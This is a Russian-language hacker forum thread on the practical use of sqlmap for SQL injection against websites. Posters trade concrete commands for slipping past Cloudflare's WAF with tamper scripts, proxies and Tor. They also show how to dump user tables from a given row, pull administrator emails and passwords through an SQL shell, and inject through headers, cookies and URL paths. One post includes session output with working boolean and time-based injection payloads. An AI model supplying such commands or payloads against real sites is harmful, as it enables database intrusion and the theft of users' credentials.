Вопросы по SQLMap

Discussion in 'Уязвимости' started by randman, 1 Oct 2015.

  1. randman

    randman Members of Antichat

    Joined:
    15 May 2010
    Messages:
    1,372
    Likes Received:
    604
    Reputations:
    1,101
    Вопросы по SQLmap и Havij оставляем только здесь :)

    Вопросы в других темах будут переноситься сюда или удаляться. Пожалуйста, не забывайте использовать тег [CODE].

    Официально руководство: https://github.com/sqlmapproject/sqlmap/wiki/Usage
     
    #1 randman, 1 Oct 2015
    Last edited by a moderator: 11 Oct 2015
    CKAP, Turanchocks_ and grimnir like this.
  2. Code Hunter

    Code Hunter New Member

    Joined:
    26 Dec 2007
    Messages:
    33
    Likes Received:
    3
    Reputations:
    0
    Очень актуальная тема для меня сейчас.

    Прошу помочь определится, в чем разница кроме интерфейса между sqlmap и sqli dumper?
     
    #2 Code Hunter, 7 Oct 2015
    Last edited: 7 Oct 2015
  3. -=Cerberus=-

    -=Cerberus=- κρυπτός γράφω

    Joined:
    29 Apr 2012
    Messages:
    1,254
    Likes Received:
    762
    Reputations:
    378
  4. vikler

    vikler Member

    Joined:
    16 Aug 2012
    Messages:
    94
    Likes Received:
    7
    Reputations:
    0
    Я использовала сто раз tamper scripts, но тут же оракл, а они для mysql/mssql
     
  5. sysjuk

    sysjuk Member

    Joined:
    5 Jan 2012
    Messages:
    216
    Likes Received:
    39
    Reputations:
    3
    Как через sqlmap обойти можно cloudflare?
     
  6. strelok20094

    strelok20094 Member

    Joined:
    26 Mar 2011
    Messages:
    81
    Likes Received:
    5
    Reputations:
    2
    First of all, you need to make sure the target site is protected by Cloudflare, you can add "--identify-waf" or "--check-waf" to confirm. However, do not set "--thread=" larger than 1 as the target will give you "403 Forbidden" error. Once you get the "403 error", your IP address is banned. Therefore, you are required to consider to use proxy servers or TOR to access the target.

    Secondary, you need to add "--tamper='between,randomcase,space2comment'" and "-v 3", if the target is confirmed being protected by Cloudflare. You may also consider to add "--random-agent" and "--tor" when necessary.

    Прежде всего, вы должны убедиться, что целевой сайт защищен Cloudflare, вы можете добавить "--identify-WAF" или "--check-WAF" для подтверждения. Не используй "--thread =" больше, 1 потока тк это даст вам "403 Forbidden" сообщение об ошибке. Как только вы получите "ошибку" 403, Ваш IP будет запрещен. Таким образом, вы должны рассмотреть возможность использования прокси-серверов или TOR для доступа к цели.

    Второе что, вам нужно добавить "--tamper = 'between,randomcase,space2comment'" и "-v 3", в принципе этого будет достаточно чтобы cloudflare отьебался. Вы также можете рассмотреть вариант с добавлением "--random-агент" и "--tor", когда это необходимо.
     
  7. sysjuk

    sysjuk Member

    Joined:
    5 Jan 2012
    Messages:
    216
    Likes Received:
    39
    Reputations:
    3
    Есть еще вопрос, как допустим сдампить правильно сдампить таблицу с определенного столбца, допустим в бд 10000юзеров, мне нужно с 5000 начать дампить, как это сделать?
    и еще, как сдампить конкретно админов по группам.
     
  8. yarbabin

    yarbabin HACKIN YO KUT

    Joined:
    21 Nov 2007
    Messages:
    1,681
    Likes Received:
    884
    Reputations:
    363
    --where="условие" типа userid>5000, только с реальным именем колонки
     
    _________________________
    sysjuk likes this.
  9. grimnir

    grimnir Reservists Of Antichat

    Joined:
    23 Apr 2012
    Messages:
    1,026
    Likes Received:
    605
    Reputations:
    174
    --start=5000
    --sql-shell далее пишем запрос как при обычной выборке SELECT mail,pass,etc FROM base.table WHERE условие критерия админа
    Админы прикрепите пожалуйста официальное руководство в тему вверху,то одни и те же вопросы.
    https://github.com/sqlmapproject/sqlmap/wiki/Usage
     
    _________________________
    Waki and sysjuk like this.
  10. BabaDook

    BabaDook Level 8

    Joined:
    9 May 2015
    Messages:
    830
    Likes Received:
    1,028
    Reputations:
    70
    sql-qure="запрос"
     
    sysjuk likes this.
  11. kacergei

    kacergei Member

    Joined:
    26 May 2007
    Messages:
    160
    Likes Received:
    8
    Reputations:
    0
    Подскажите перепробовал уже тьму вариантов, как можно нормально вытащить таблички и колонки (не перебирая по списку)
    Code:
    sqlmap.py -u "http://site.com/" --headers="X-Forwarded-Host:*" -D db_site --tables
    [00:48:09] [INFO] resuming back-end DBMS 'mysql'
    [00:48:09] [INFO] testing connection to the target URL
    [00:48:09] [INFO] checking if the target is protected by some kind of WAF/IPS/IDS
    sqlmap resumed the following injection point(s) from stored session:
    ---
    Parameter: X-Forwarded-Host #1* ((custom) HEADER)
        Type: boolean-based blind
        Title: OR boolean-based blind - WHERE or HAVING clause
        Payload: -3650') OR 8491=8491 AND ('uAYR'='uAYR
    
        Type: stacked queries
        Title: MySQL > 5.0.11 stacked queries (SELECT - comment)
        Payload: ');(SELECT * FROM (SELECT(SLEEP(5)))WjQQ)#
    
        Type: AND/OR time-based blind
        Title: MySQL >= 5.0.12 AND time-based blind (SELECT)
        Payload: ') AND (SELECT * FROM (SELECT(SLEEP(5)))hXGz) AND ('hNrS'='hNrS
    ---
    back-end DBMS: MySQL >= 5.0.0
    banner:    '5.6.19-log'
    [00:48:20] [ERROR] unable to retrieve the table names for any database
    do you want to use common table existence check? [y/N/q]
    Перебирая не находит то что нужно( бд по букве хоть но вывел
    а так: [ERROR] unable to retrieve the table names for any database
     
  12. grimnir

    grimnir Reservists Of Antichat

    Joined:
    23 Apr 2012
    Messages:
    1,026
    Likes Received:
    605
    Reputations:
    174
    Попробуйте варианты

    sqlmap.py -u "http://site.com/" --headers="X-Forwarded-Host:*" -D db_site --tables --technique=B --hex -v3 --is-dba
    sqlmap.py -u "http://site.com/" --headers="X-Forwarded-Host:*" -D db_site --tables --technique=B --no-cast -v3
    посмотреть причину ошибки по логу или возможно, нет прав
     
    _________________________
  13. ol1ver

    ol1ver Active Member

    Joined:
    22 Jul 2011
    Messages:
    262
    Likes Received:
    110
    Reputations:
    0
    Господа хорошие, подскажите пожалуйста.
    Пытаюсь крутить скулю через cookie (именно подсавлять в куке), но нахожу статьи только как авторизоваться. Ошибка что выдает говорит мне - идиот, я же в get ищу, а что искать?
    И правильно ли я формирую запрос (http)?

    Спасибо.

    [​IMG]
     
  14. private_static

    Joined:
    19 May 2015
    Messages:
    118
    Likes Received:
    74
    Reputations:
    22
    попробуйте убрать -p "login" и в куках которые вы указали после значения логина добавить символ *
    должно получиться чтото вроде --cookie="login=mylogin*"
     
  15. Waki

    Waki Member

    Joined:
    9 Oct 2015
    Messages:
    55
    Likes Received:
    31
    Reputations:
    10
    добавь --level=2

    https://github.com/sqlmapproject/sqlmap/wiki/Usage
     
  16. WallHack

    WallHack Member

    Joined:
    18 Jul 2013
    Messages:
    245
    Likes Received:
    93
    Reputations:
    25
    Можно ли sqlmap сканнировать такой запрос:
    sqlmap.py -u "site.ru/add/%27"
    Или какой софт сканерует такой запрос ?
     
  17. xivi00

    xivi00 Banned

    Joined:
    23 Nov 2013
    Messages:
    50
    Likes Received:
    2
    Reputations:
    0
    WallHack присоединяюс тоже интересно
     
  18. private_static

    Joined:
    19 May 2015
    Messages:
    118
    Likes Received:
    74
    Reputations:
    22
    sqlmap.py -u "site.ru/add/*"
     
  19. gmiller

    gmiller New Member

    Joined:
    18 May 2011
    Messages:
    19
    Likes Received:
    3
    Reputations:
    0
    Попробуй sqlmap.py -u "site.ru/add/*"
     
  20. strelok20094

    strelok20094 Member

    Joined:
    26 Mar 2011
    Messages:
    81
    Likes Received:
    5
    Reputations:
    2
    Что это за бред? Обычная sql льется без проблем, вместо %27'' ставишь * и льешь
     
Loading...